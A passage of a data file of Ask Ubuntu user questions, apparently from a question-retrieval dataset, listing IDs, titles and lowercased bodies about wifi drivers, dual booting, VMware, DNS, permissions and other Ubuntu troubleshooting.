[ 1318.015161 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1318.015162 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1318.015164 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1318.015165 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) what i have found is that it appears to be loading an old version of the firmware but i do n't know how or why peter @ xps : /lib/firmware $ modinfo iwlwifi | grep 7260 firmware : iwlwifi-7260-6.ucode peter @ xps : /lib/firmware $ ls *7260-6* ls : can not access *7260-6* : no such file or directory any suggestions of how to get this setup very welcome .
331671	unable to see shared folders in ubuntu ( guest ) installed in vmware	i have installed ubuntu 13.04 in vmware workstation in my windows7 os . i installed vmware tools in ubuntu . i have configured the shared folders in settings . using the below command , i am able to get shared folders /usr/bin/vmware-hgfsclient but the shared folders are not present /mnt/hgfs i tried to install vmware tools multiple time but no luck .
331674	how do i get my internet to work ?	i recently built a computer and installed ubuntu on it . the wireless i put into it was taken out of a hp pavilion slimline s5-1024 desktop . i checked on the internet and the wireless card is ralink corp rt5390 wireless 802.11n 1t/1r pcie . every time i get on my computer , it acts as if everything is ok , but i cant find my home internet and most of the options are dark so i cant click on them . i am very new to all of this and i would just like my wifi to work . would installing a driver for it help ? do i have to get a different adapter ?
331675	how can i get my wifi to work on my dell 3521 laptop ?	i have installed ubuntu 12.04 alongside windows 8 in my dell 3521 laptop and everything is working fine except the wi-fi in ubuntu . in win 8 wifi is working well but when i start ubuntu it does not show any wifi options . i have tried installing all the drivers required but still not working . i dont know its because of the wi-fi car ( atheros ) or something else . can someone please tell me the solution for this problem . additional information about the card- atheros communication inc. device [ 168c:0036 ] ( rev 01 ) subsystem : dell device [ 1028:020c ] thanks in advance .
331676	installing ubuntu 13.04 on a msata ssd	i am trying to install ubuntu 13.04 on my 24gb msata ssd . in my laptop , i 've also got a 500gb sata hdd . i realize that in order for this to work i need to put my /home directory on the 500gb hdd . i 've tried installing it by creating a ext4 partition on the ssd and a 8gb swap partition on my hdd . this resulted in an error saying something similar to can not install bootloader , please select an other location for the bootloader . now before i waste any more time trying to get it to work i 'm going to ask a bunch of questions : where should i put the swap partition ? how big should i make the swap partition ? ( i 've got 12gb ram ) my 500gb hdd is currently in raid mode . should i change that ( to ahci or ide ) ? where should i put the bootloader if the error message occurs again ? how do i make the home directory point to the hdd instead of the ssd ? can i configure ubuntu to install software/packages on the hdd instead of the ssd ?
331680	invisible updates	today i received an update notification for three updates but update manager does n't say what updates are they . does anyone have a clue what this is about ? how am i to check what is to be updated ?
331681	unable to install openvas in ubuntu 12.04	while installing openvas vulnerability assessment suite from the software center i am getting the following error : the following packages have unmet dependencies : openvas : depends : openvas-libraries but it is not going to be installed depends : greenbone-security-desktop but it is not going to be installed what might be the problem ? what should i do install it ?
331685	ubuntu 13.04 not working properly after being upgraded from 12.10	i have hp pavillion g6 laptop with dual boot with ubuntu & windows . today i tried to upgrade from ubuntu 12.10 to ubuntu 13.04 , all the updates files ( 1501 files in my case ) were downloaded successfully , but during the installation of the updates , i lost my internet connection and i found that my laptop had shut down . when i restarted it , found that many of the applications were upgraded but there is no battery or networking icon on the top panel . in the network manager it says that networking is not possible with the current version . so i am not even able to connect to the internet . all the applications are not either not working properly or its taking too much time to launch them , so i close them down . it 's also taking too long to restart or shut down and , more times than not , i have to forcibly shut down .
331686	connecting to nat virtualbox guest from bridged network	i 've setup a virtualbox ubuntu 12.04 server using vagrant . i can ssh to it and even ping my desktop from it . what does n't work is to ping the guest os from my desktop . i 've tried to flush the iptables and disable my firewall ( ufw disable ) . the guest os is configured as nat ( 10.0.2.15 ) . and my desktop as bridged ( 192.168.0.23 ) . i also tried configuring the guest os to have bridged networking as well . but then i could not start the django development server . got an error about it not being possible to use that ip . what am i missing here ? vagrant @ precise32 : ~ifconfig -a eth0 link encap : ethernet hwaddr 08:00:27:12:96:98 inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe12:9698/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:193157 errors:0 dropped:0 overruns:0 frame:0 tx packets:102002 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:170818571 ( 170.8 mb ) tx bytes:8109666 ( 8.1 mb ) eth1 link encap : ethernet hwaddr 08:00:27 : a1 : d9:5f inet6 addr : fe80 : :a00:27ff : fea1 : d95f/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:795 errors:0 dropped:0 overruns:0 frame:0 tx packets:115 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:60352 ( 60.3 kb ) tx bytes:30546 ( 30.5 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1226 errors:0 dropped:0 overruns:0 frame:0 tx packets:1226 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:361973 ( 361.9 kb ) tx bytes:361973 ( 361.9 kb ) vagrant @ precise32 : ~ $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp # vagrant-begin # the contents below are automatically generated by vagrant . do not modify . auto eth1 iface eth1 inet dhcp post-up route del default dev $ iface # vagrant-end
331687	why can not xdg-desktop-menu-dummy.menu be backed up ?	i am using deja dup for backups . since a few weeks it keeps on complaining could not backup the following files < please make sure you are able to open them . /home/username/.config/menus/applications-merged/xdg-desktop-menu-dummy.menu i do not recall having changed anything to that file . it 's permissions are -rw -- -- -- - ( like all other files in that directory ) . any idea how to fix this problem ? should i just delete the file ?
331689	software updater is empty in xubuntu 13.04	i have just installed xubuntu 13.04 on an old laptop , and once a day i get the notification that updates are available . but when i open software updater , it shows that there are some updates , but the list is empty : what do i need to do to see the names of the packages that have updates ? there are a few similar question already , but they do not solve my issue . software updater shows no details about the updates suggests reinstalling gtk3-engines-oxygen but that package is not installed , so it can not be removed . invisible updates talks about apt-get upgrade . i have tried that , but it does not solve the issue .
331693	bluetooth seems to be feeling blue . how do i make it work ?	i looked at the solutions here : trouble turning on bluetooth in 12.04 bluetooth is not working in ubuntu 12.04 bluetooth is n't working in 12.04 dell laptop 's bluetooth is n't detected by ubuntu : not entirely clear what exactly is being suggested on this one bluetooth not working after installing ubuntu 12.04 i ca n't turn on my bluetooth ? none of those work for me . i have a asus u32u laptop with 12.04 installed . bluetooth has never worked correctly for me in the past . previously , i used to stop and start the bluetooth service manually and that used to do the trick . however , that solution stopped working since the latest set of updates . what can i do to make it work correctly or at the very least , make it work at all ? u32u : ~ $ rfkill list ... 2 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no u32u : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 002 : id 058f : a014 alcor micro corp . bus 003 device 003 : id 12d1:140b huawei technologies co. , ltd. ec1260 wireless data modem hsd usb card bus 004 device 003 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth
331694	install ubuntu from scratch	i have windows installed on my 500 gb hard disk which contains of 5 partitions . one for system drive and rest four for data . i want to format and remove all the 5 partitions and convert that to following three partitions : 30 gb ubuntu gnome 13.04 . 2 gb linux - swap . 50 gb windows 7 . rest windows ntfs partitions . i have a bootable windows 7 ultimate dvd , a bootable ubuntu gnome 13.04 flash drive . i do n't wish to backup any data that i have i want to remove all the partition and install both the os from scratch . i read many articles but each one has a different method some suggesting to use gparted , and some others to install ubuntu first and then windows etc . please suggest me a step by step detailed guide or reference to complete the task .
331703	aplication bar is missing and so is title bar after installing 13.04	all i have is a screen that has the background . i am able to open a terminal screen . and i have tried all of the suggested fix . every time i try to `` enable ubuntu unity plugin '' . i get a message stating `` scale not found . '' how do i get the system to find and recognize scale ?
331704	ubuntu linux 13.04 and windows 8 do n't like one another	well , i have done everything possible to ensure that all is well but to no avail . i tried to install ubuntu 12.04.2 and 13.04 onto a hdd with uefi but all i get is the black screen . i then tried vga=normal nomodeset at the end of the kernel line . nothing happened . i then tried to install ubuntu linux 13.04 in the legacy boot . i then ran boot-repair with the following from http : //paste.ubuntu.com/5976834/ . now i can not get ubuntu to log in . any ideas out there ?
331706	run ubuntu on an imac g5	i have an old imac g5 ( without a webcam ) that i would like to get running ubuntu . the imac has no hard drive in it , and i would like to get a live cd running so i can test out ubuntu before i buy a hard drive to boot from , but i 'm having trouble running the live cd . i downloaded the ubuntu 12.04 powerpc live desktop build from here ( http : //cdimage.ubuntu.com/releases/precise/release/ , 5th link down ) and burned on to a dvd-r at the lowest speed . when i put it in my imac and held down the 'c ' key to boot from a cd/dvd , the superdrive spins up , spins down , and ejects the disk . the imac then displays a folder with a question mark superimposed on it ( the icon for a missing startup disk ) . i 've read that this means the cd is not suitable to boot on that computer . according to the ubuntu powerpc faq ( https : //wiki.ubuntu.com/powerpcfaq ) , my imac is compatible . am i downloading the wrong download ? do i need a different cd/dvd ? is my download of ubuntu corrupted ? why wo n't ca n't i get my dvd boot ?
331708	installer error	i download the os from the download on the ubuntu website , and after waiting for almost 24hours , only for it to tell me that something is wrong with the installer i tried it again with the same results so finally tried the alternative download with the torrent and i am still getting the same issues . i would really to know how to get this working because i am truly fed up with my windows 7 always shutting my network connections . i have to go back to the factory default and would love to just wipe the drive clean with only ubuntu left .
331712	windows 8 will not start	i have ubuntu 12.04 and windows 8 installed on my i3 laptop . suddenly , windows 8 stopped booting . i tried sudo ntfsfix /dev/sda2 which tells me that could not wake up from hibernate
331722	barry installition	in an attempt to install blackberry application ( barry ) following guide listed at : installing or setting up barry in ubuntu 12.04 i got the error : could not save the file /etc/apt/sources.list.d/barry.list . you do not have the permissions necessary to save the file . please check that you typed the location correctly and try again . right clicked on folder sources.list and under permissions i found that root have create and access permissions while group and others have access only permissions then at the bottom `` you are not the owner , so you can not change these permissions '' . am new to ubuntu ( wubi ) and not sure how to change these permissions am the only user and my password is/was root installation password .
331724	can not install epson wf-2010 on ubuntu 12.04	i 'm unable to get a wf-2010 printer working with kubuntu 12.04 ( using the kde printer settings ) . i 've downloaded the amd64 drivers from epson and installed them with dpkg . however , nothing much happens after install : a directory is created in opt but no additional drivers are available . i can manually unzip the ppd file i need , and install it , but i 'm unable to print a test page ( stays in the stopped state ) . how am i supposed to install these epson drivers ?
331726	printing from hp-ux v11.11 via lpd protocol ( port 515 ) to cups queue on ubuntu server 12.04 i386 does not work	i was migrating my old document composition software from sles9 to ubuntu server 12.04 i386 . everything was working fine until i tried to print from the erp environment ( hp-ux v11.11 ) to my new print server in ubuntu . the printing requests are not transferred from the hp-ux printing spooler queue to the new print-server . i think it could be the missing lpd socket ( port 515 ) which is not available on the new machine . i do n't see it listing on the port ( netstat -lpn ) . i searched on google for any soulutions , but i ca n't find anything that works . does anyone know what i have to do so that i can use the lpd protocol like in the old sles9 distribution where it works fine at the moment ? i tried to install lpr but it does n't open a listening port on 515 .
331733	error while dumping ethernet network card bios 's rom - rtl8111/8168b	using this tutorial `` using the pci sysfs interface to dump the video bios rom '' i tried to repeat the steps for dumping bios rom from the network card . my network card is : polipo @ polipo : ~ $ lspci [ snip ] 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 01 ) polipo @ polipo : ~ $ so i typed this to be sure where 's my network card rom : polipo @ polipo : ~ $ find /sys/devices -name `` rom '' /sys/devices/pci0000:00/0000:00:01.0/0000:01:00.0/rom /sys/devices/pci0000:00/0000:00:1c.3/0000:03:00.0/rom polipo @ polipo : ~ $ it 's the second result . now i have to dump it . so typing what has to be typed , i 'm getting error : polipo @ polipo : ~ $ echo 1 | sudo tee /sys/devices/pci0000:00/0000:00:1c.3/0000:03:00.0/rom 1 polipo @ polipo : ~ $ sudo cat /sys/devices/pci0000:00/0000:00:1c.3/0000:03:00.0/rom > netbios.rom cat : /sys/devices/pci0000:00/0000:00:1c.3/0000:03:00.0/rom : input/output error polipo @ polipo : ~ $ see ? input/output error.. using ethtool i also get an error : polipo @ polipo : ~ $ sudo ethtool -e eth0 > romdump.rom can not get eeprom data : operation not supported polipo @ polipo : ~ $ here 's more info : polipo @ polipo : ~ $ ethtool -i eth0 driver : r8169 version : 2.3lk-napi firmware-version : bus-info : 0000:03:00.0 supports-statistics : yes supports-test : no supports-eeprom-access : no supports-register-dump : yes polipo @ polipo : ~ $ so it looks like my network card does n't allow me to make dumps of it 's bios rom , using eeprom access ? but to me it 's a bit confusing - i mean , it should be possible to dump any hardware 's firmware , right ?
331736	normalize .ogg audio files with the command line	i 'm trying to normalize ( and or compress ) around 100 .ogg files which have audio level really too low . i know that by hand i can use audacity ... but that will be too much clicks ! instead i was looking for a tool which can be used in a small script ( or with -- recursive ) . just tried to look in man oggenc , man ffmpeg , with no success yet ... thanks !
331739	how to play hi10p videos in totem ?	i would like to know , how i can play hi10p videos ( h264 videos with 10bit colordepth ) in totem . i know that it 's possible to play those files in 13.04 , but i 'd rather stick to the lts version . gstreamer0.10-ffmpeg : installiert : 0.10.13-1 kandidat : 0.10.13-1 versionstabelle : *** 0.10.13-1 0 500 http : // at.archive.ubuntu.com/ubuntu/ precise/universe amd64 packages 100 /var/lib/dpkg/status libavcodec-dev : installiert : ( keine ) kandidat : 4:0.8.6-0ubuntu0.12.04.1 versionstabelle : 4:0.8.6-0ubuntu0.12.04.1 0 500 http : // at.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : // security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 4:0.8.1-0ubuntu1 0 500 http : // at.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libavcodec53 : installiert : 4:0.8.6-0ubuntu0.12.04.1 kandidat : 4:0.8.6-0ubuntu0.12.04.1 versionstabelle : *** 4:0.8.6-0ubuntu0.12.04.1 0 500 http : // at.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : // security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 4:0.8.1-0ubuntu1 0 500 http : // at.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libavcodec-extra-52 : installiert : ( keine ) kandidat : ( keine ) versionstabelle : libavcodec-extra-53 : installiert : ( keine ) kandidat : 4:0.8.6ubuntu0.12.04.1 versionstabelle : 4:0.8.6ubuntu0.12.04.1 0 500 http : // at.archive.ubuntu.com/ubuntu/ precise-updates/universe amd64 packages 500 http : // security.ubuntu.com/ubuntu/ precise-security/universe amd64 packages 4:0.8.1ubuntu1 0 500 http : // at.archive.ubuntu.com/ubuntu/ precise/universe amd64 packages
331740	installing ubuntu 13.04 on an 8g memory stick	i have tried to install the operating system 12.04,13.04 ) on an 8g memory stick . it installed ok except when i booted from it , it said it only had 3.5g total and was full . when i tried to reinstall it with the live disc , it said it needed at least 4g to go ahead and that box was ticked . it seems as if it does n't want to provide any memory not being used as the operating system . how do i ensure that the full memory is available and read/write enabled
331744	`` phablet-flash : error : too few arguments '' when installing ubuntu touch	i am using galaxy nexus yakjuux variant , i have converted it to yakju now since the basic requirements given for installing ubuntu touch was to have yakju or takju . i am running 4.3 android now , i have unlocked the bootloader by the above process mentioned but when i execute phablet-flash -b it gives me below error : usage : phablet-flash [ -h ] ... phablet-flash : error : too few arguments i am using ubuntu 13.04 . also , some extra info : when i execute the adb devices command it does n't show the offline mode as mentioned on the guide .
331747	how to make a quickly project standalone ?	i have a quickly project . but now i want it to be independent from quickly . how can i do it ? how can i run it without typing 'quickly run ' ?
331751	rhythmbox default radio stations missing	i installed ubuntu 13.04 on a new machine yesterday and started rhythmbox . there were several default radio station ( iradio ) preloaded there . i started a stream and did reboot the machine some time later . after the reboot all radio stations are missing from rhythmbox . i tried reinstalling rhythmbox , tried deleting .local/share/rhythmbox ... but nothing . i just want to get the default stations back , that 's all .
331752	how to set different folder/file permission for differrent user names or user groups ?	i am migrating my home server from windows based to ubuntu based server . i am happy and satisfied with my windows xp based file server and have been using it for about 6 years now . i am decommissioning the windows xp server and wish to use my new linux server based on ubuntu 12.04 lts desktop edition . i plan of using the server edition when i 'll be satisfied with the desktop edition . but right now , i am having some problem with file permission in my new ubuntu server . in my windows xp , i 've shared a 4tb raid0 array and the whole of it is shared within my workgroup . i have several users with different user permissions and i wanted this to be applied also in my ubuntu server . but i am having some problem implementing it . probably because of my lack of knowledge administering it . right now , in my ubuntu server , i created a 4tb raid array and the whole of it is shared . the contents of the raid array is chowned recursively to admin-one : users . the contents of the raid array is chmoded recursively to 750 . in the server i have created the user-one and user-twoaccount that belongs to users group . in the shared raid array , i have a folder called restricted . everything is setup well and runs fine with the client machine . the problem now is , i have no idea on how shall i restrict user-one from accessing the restricted folder , since user-one belongs to users group that has read and execute permission for the whole contents of the raid array and from where the restricted folder is located too . i can easily do this in windows , but not in ubuntu . to summarize the user 's permissions : admin-one - has read write execute permission to the whole shared partition . user-one - has read and execute permission to the whole shared partition . user-two - has read and execute permission to the whole shared partition . and what i want to accomplish is : user-one - has read and execute permission to the whole shared partition but shall have no access to the restricted folder . user-two - has read and execute permission to the whole shared partition that includes the restricted folder , but shall have not write permission to the folder . so , the general question is , how shall i set different permissions to different users ?
331756	weird dns behavior	i got hold of a really cute little pc , that i want to fiddle around with as a little side-project . it has a normal lan connection via ethernet and the /etc/network/interfaces configuration is # loopback : lo auto lo iface lo inet loopback # device : eth0 auto eth0 iface eth0 inet static address 192.168.1.11 broadcast 192.168.1.255 netmask 255.255.255.0 gateway 192.168.1.1 dns-nameservers 8.8.8.8 8.8.4.4 now , everything runs smoothly , the pc binds to 192.168.1.11 and i can ssh into it . however , curl google.com fails ( directly connecting using the ip 173.194.112.255 works ) . so , something 's got ta be wrong with the nameservers . and here comes the strange part : after ifdown eth0 & & ifup eth0 all dns queries work . and this happens after every reboot . i have to manually restart eth0 , before i can resolve domain names . currently i cope with that by having an upstart script restart the interface 10 seconds after booting . but i 'd really like to fix the cause and not the symptom . is it my fault or is there some bug ? i 'm currently running ubuntu server 10.04 lts for compatibility reasons . after a fresh restart ( without restarting the interface ) /etc/resolv.conf is empty ( only comments ) . /etc/resolvconf/resolv.conf.d/ { head , base } are empty ( only comments ) . after restarting the interface /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 8.8.8.8 nameserver 8.8.4.4 /etc/resolvconf/resolv.conf.d/ { head , base } are empty ( only comments ) .
331759	ubuntu : 12.10 stuck on boot splash with flickering screen ( with message superblock write/mount time is in future )	my system gets stuck on boot splash screen ( flickers with boot splash and below message ) dev/loop0 : clean : superblock last write time is in future ( by less than a day , probably due to clock being incorectly set dev/loop0 : clean : superblock last mount time is in future ( by less than a day , probably due to clock being incorectly set . prompt shell is working , looking for any command which can help in fixing the issue .
331763	does ubuntu support my video cards ?	i have a dell vostro 3500 and i have a lot of problem in linux mint 12 lisa . the laptop overheat and shuts down when i have a lot of processing . i read that the problem is because of the video drivers and the two video cards . the embedded intel can not be desabled . can anybody tell me if this problem is solved in ubuntu ? thanks , manuel
331768	how to install ubuntu as the default os in a pc	my problem is that i want to install ubuntu as the default operating system but i want to format my computer ( here comes the problem ) i can not enter the systems that i had before : windows 8 windows vista debian ubuntu ( the one that i wish as default ) andoid-x86 can you please tell me how to format my pc ? my computer is an acer aspire 1gb ram ( i will put more later ) 250 ram amd
331769	youtube is not working	why is youtube not working ? i have downloaded and installed the ubuntu restricted extras but chromium says `` could not load shockwave flash '' is there a way to fix this . i tried downloading google chrome but that didnt work even on firefox it dosent work.i want this fixed badly .
331770	how do i customize xterm	i would like to customize xterm because the default font-size is pretty small . i would also like to change my xterm font to inconsolata . i have a few questions . how would i know my default xterm font-size and font-family ( xrdb -query do n't show my font information ) ? what is the path for my xterm font ? what are the acceptable formats for xterm fonts ? should i be only using monospace ? where i should be storing configuration ? would it only affect xterm or other terminals like gnome-terminal ? any standard format for xterm configuration ? i 've google a bit but just got me confused because i ca n't seem to find a standard syntax for some configuration . others use the classname xterm or xterm and with regards to fontsize : i 've found a lot of formats . like : xterm*facename : monospace : size=20 or xterm*font : *-fixed-*-*-*-18-* or xterm -fa `` fontname '' i 'm using ubuntu 12.04lts . i 'm overwhelmed by the manpage of xterm since i 'm just a beginner . i would like to get help from you guys . thanks it advance .
331773	replace my operating system ?	i wanted to install ubuntu on my new laptop , but i do n't want to replace my operating system ( windows 7 ) that i just purchased . when i start the downloader from a cd burned image , it acts as though i am replacing my new os , despite the fact i was told it would give me an option to install it as a program . will it replace it , or i am just being stupid ?
331774	have ssd with windows 7 , ubuntu 13.04 installed but grub does not work	i have installed ubuntu several times and grub does not work . i tried using the boot repair tool and this always gives an error that is not informative . i saw when creating the drive that there was a windows loader partition and ubuntu proposed sda upon which also had the loader partion . what can i do to get this to work ? anyone have an idea .
331776	login loop , can only login as guest . ubuntu 12.04	my computer wont allow me to login unless its as guest . i have pressed ctrl+alt+f1 and can login using my administrator account there , but not in the normal interface . i have done updates and upgrades from the terminal , and also tried to create a new admin user , and assigned the user to the same group as the administrator account , but cant login to that user either from the normal login screen . when i login the screen flashes black and then returns to the login screen is there a way to view an error log file to see what the error is that is returning me to the login screen ? how can i do this to figure out what the problem is ? i have also followed instructions on this page ubuntu 12.10 gets stuck in a login loop it looks like a similar problem , but the fix did not work for me : ( i would like to get back into my admin account and my programs but i am stuck in guest
331783	is there a tool similar to spotlight search in os x for ubuntu ? ( specifically ubuntu 12.04 )	is there any tool equivalent to spotlight search in os x for ubuntu 12.04 ? something where you just type a search string and files , folders or installed programs will appear in a list .
331786	ubuntu is slow and i do n't know why	i 've been an xp user forever and i still am . yesterday wanted to try ubuntu i installed it and its very very slow on my computer . here 's my computer specs intel celeron ( r ) 2.40 ghz 1 gb of memory . did i do something wrong because i heard ubuntu is really fast . when i look in system monitor it says the the cpu is constantly at 100 % . thanks
331789	cad *.stp files on ubuntu 13.04 32bit	i 'm not able to open 3d cad *.stp files on my ubuntu , i tried to import them with salome meca however without effect ? what went wrong ?
331801	what is the absolute minimum that a linux system needs to boot ?	i think that i need a kernel image and a bootloader ( grub ) . is there anything else that a linux system needs to boot ?
331804	my system update requires installation of untrusted packages	i 'm trying to install the latest updates from my software manager and it wants me to install untrusted packages ? should i install the packages , if so , how ? it just says it requires the untrusted packages and when i click ok it goes back to the software updater .
331808	are parallel scanners supported ?	are parallel scanners supported ? i 've got an epson action scanner that i 've used under windows as a back up in case my sub died ... well , it did . tried to use the parallel , and it was n't even recognised .
331811	how to fix unity while using proprietary drivers ?	my side and top pannels have disappeared after an upgrade to ubuntu 13.04 . i do n't remember how , but i solved this problem , i just remember i had to use the open source driver for my amd card . but the thing is that i tried to use again the proprietary driver so that i could play games better , but this made my unity crash again , and i need help on how to fix it , while using proprietary drivers . by the way , i tried just enabling the open source driver but this did n't work . thanks in advance , and just ask for any information you need , since i do n't know what kind of info i should post here . the output of sudo lspci -nn is : https : //dl.dropboxusercontent.com/u/82342689/sudo % 20lspci % 20-nn % 20 % 28output % 29.txt file /var/log/udev : https : //dl.dropboxusercontent.com/u/82342689/udev file /var/log/dmesg : https : //dl.dropboxusercontent.com/u/82342689/dmesg file /var/log/xorg.0.log : https : //dl.dropboxusercontent.com/u/82342689/xorg.0.log glxinfo output : /usr/lib/nux/unity_support_test -p gives the same output as glxinfo but instead of 12 , it is 22 .
331822	can´t force upgrade to tomcat 7.0.42 from ubuntu 12.04 ( precise pangolin )	i want to use tomcat support to websocket , but it has to be above tomcat version 7.0.26 which comes with ubuntu 12.04.2 lts . i don´t want to run it stand-alone , want to try to solve it with apt-get . in a 12.10 release the tomcat version is 7.0.30 , but i don´t want to do a release upgrade to a non-lts option , any ideas ? thanks
331825	external monitor not detected on 13.04 on a dell xps 13 via mini dp	i upgraded my dell xps 13 developer edition laptop from 12.04 to 13.04 and now it seems the mini display port is n't working at all . i 've tried using an apple-branded mini dp to vga adaptor and a generic mini dp to hdmi adaptor and neither is detected . here 's my terminal output : hellocatfood @ computerfood : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 edp1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 294mm x 165mm 1920x1080 60.0*+ 59.9 40.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) any suggestions for making this work are very welcome !
331828	how to add 'volume up , muted ' keyboard command ?	when i change volume using the media keys there is a popping sound notification . sometimes i 'm playing media , and i want to adjust the volume without sound notification . i want to add volume up , muted - > shift + audio raise volume shortcut . how do i do it ? binding shift + audio raise volume to amixer set master 10 % + changes the volume , but does n't display the visual indicator of volume change . looking at dbus-monitor shows different events : stock volume up : method call sender=:1.4 - > dest=:1.25 serial=2167 path=/org/freedesktop/notifications ; interface=org.freedesktop.notifications ; member=getcapabilities method return sender=:1.25 - > dest=:1.4 reply_serial=2167 array [ string `` body '' string `` body-markup '' string `` icon-static '' string `` image/svg+xml '' string `` x-canonical-private-synchronous '' string `` x-canonical-append '' string `` x-canonical-private-icon-only '' string `` x-canonical-truncation '' string `` private-synchronous '' string `` append '' string `` private-icon-only '' string `` truncation '' ] method call sender=:1.4 - > dest=:1.25 serial=2168 path=/org/freedesktop/notifications ; interface=org.freedesktop.notifications ; member=notify string `` gnome-settings-daemon '' uint32 0 string `` notification-audio-volume-medium '' string `` `` string `` '' array [ ] array [ dict entry ( string `` x-canonical-private-synchronous '' variant string `` volume '' ) dict entry ( string `` value '' variant int32 61 ) ] int32 -1 method return sender=:1.25 - > dest=:1.4 reply_serial=2168 uint32 0 signal sender=:1.49 - > dest= ( null destination ) serial=1119 path=/com/canonical/indicator/sound/menu ; interface=com.canonical.dbusmenu ; member=itemspropertiesupdated array [ struct { int32 3 array [ dict entry ( string `` x-canonical-ido-volume-level '' variant double 61.5646 ) ] } ] array [ ] then amixer set master 10 % + : signal sender=:1.49 - > dest= ( null destination ) serial=1116 path=/com/canonical/indicator/sound/menu ; interface=com.canonical.dbusmenu ; member=itemspropertiesupdated array [ struct { int32 3 array [ dict entry ( string `` x-canonical-ido-volume-level '' variant double 73.5641 ) ] } ] array [ ] it seems that volume up also runs some command that checks capabilities and shows a volume indicator . where can i call this command directly ?
331838	install 13.04 and only have a black screen with mouse pointer	i have installed a 13.04 using the usb . now i only have a black screen with the mouse pointer . when i use the control/alt/delete keys i can switch to a new screen which lets me choose different users to log on with ( i.e . guest ) . no matter what i select i only get a black screen . this computer had a bad hard drive so it was replaced . now that hard drive has been replaced i was only going to use ubuntu as my only os . not being very computer savvy i hope someone has some ideas . thanks
331839	is the radeon hd 7650 compatible with ubuntu ?	i am planning to buy a new notebook . i found a cheap one with radeon hd 7650m . will it be fully supported by ubuntu ? i had problems with my previous ati card ( xpress 1250 ) and i do not want to have the same problems again .
331848	it is possible to run ubuntu alongside windowns 8 ?	so , iâ´ve just bought a new laptop and it came with win8 , nevertheless i need to install ubuntu on it , running alongside . at the ubuntu website there is information only for win7 , none for win8 . can i install it normally on my computer or there is a trickier way to do it and i donâ´t know it . thanks anyway .
331852	xrdp xsession errors	so i 'm using xrdp to remote in to my linux box running xubuntu 13 . i had some issues originally logging in getting a gnome error , which i was able to fix thanks to this : i get `` failed to load session `` ubuntu-2d '' when using xrdp i can now log in but get a crash report titled `` xfsettingsd crashed with sigsegv in xfce_shortcuts_grabber_add '' . many of the icons as well as the xfce theme are missing and i get broken icons and a basic menu bar , rather than the new icons and theme . would anyone know a solution for this ? ~thanks
331860	how to create my own screenlet	i am using 1 year ubuntu as my main os already and i feel comfortable with the enviroment and the tools it provides . i also used one screenlet to have my task manager or calendar on my desktop and have it connected directly with google calendar in order to track my todos . but now i would like to make my own screen-let since i ca n't find one that will help me orgnize my stuff better , like a small little browser that fetches some webdata , or load a small html client in a screenlet . i am not sure how to start and i ca n't find any documentation on how to make my own . i have found this post but the documentation does not seem to work how do i write a screenlet ? are screenlets dead and about to be substituted by something else ? i am using ubuntu 12.04 at the moment on an intel core i7 . thank you
331861	32-bit to 64-bit migration using virtualbox	i have a 32-bit ubuntu installation which i would like to migrate to 64-bit . to minimize risk and to ensure that the installation is working i would like to first do the install on a virtualbox vm . i intend to install a fresh copy of 64-bit ubuntu on virtualbox . get a list of packages on the 32-bit system . install them on the 64-bit . merge my /etc using some kind of interactive merge . then mount my home directory , make sure everything is working . backup my old root and then copy my new root from vm to host . does this plan look okay ? is there something easier ?
